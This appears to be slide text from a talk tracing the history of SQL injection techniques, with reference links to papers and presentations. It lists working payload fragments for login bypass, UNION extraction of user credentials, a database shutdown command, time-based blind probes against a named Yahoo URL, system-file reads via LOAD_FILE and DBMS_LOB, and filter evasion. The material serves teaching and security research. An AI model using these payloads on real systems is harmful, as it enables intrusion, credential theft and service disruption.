Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
http://www.phrack.org/issues.html?id=8&issue=54
Begining
Tautology
admin
or 1=1
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
Place
Inband
-1 union select 1,1,1,1,username,1,a,1 from users --
2001 - OutBand
http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
Advanced Tricks
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
Id= 1; shutdown --
27 Mar - 2007
Outter Bands
DNS Queries
FTP Sites
SMB Files
Remote DB
Web Files
Log Files
Eyes of Fear
2002 - Blind
http://server/miphp.php?id=1 and 1=1
True
http://server/miphp.php?id=1 and 1=0
False
2010 US Army
2010 US Army
Time
http://www.northernfortress.net/more_advanced_sql_injection.pdf
ping -n 10 127.0.0.1
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=
2&scId=113; select SLEEP(5)--
http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
True
False
http://labs.portcullis.co.uk/application/deep-blind-sql-injection
Ace
union select '1','2','3',(select * from sysusers for xml raw, binary base64)
pass=
Id=A+(1/(ASCII(B)-C))
Id=A+ASCII(B)-C
Id=A+((C/ASCII(B))*(K))
LoadFile
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
DBMS_LOB
; execute immediate
DECLARE l_bfile BFILE;
l_blob BLOB;
BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO
l_blob;
l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');
DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);
DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));
DBMS_LOB.fileclose(l_bfile);
COMMIT;
EXCEPTION
WHEN OTHERS THEN ROLLBACK;
END;
; end; --
CSRF+SQLi
Smuggling
/**/aNd/**/1=aSC(substr(user(),1,1))%00
Braveness
http://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-StringParameter-Pollution-wp.pdf
XPath Injection
http://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf
LDAP Injection
http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
Forbidden
->
Python?
->
No invulnerable
.NET?
->
No invulnerable
LinQ?
->
No invulnerable
More
@chemaalonso
http://www.elladodelmal.com
http://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.html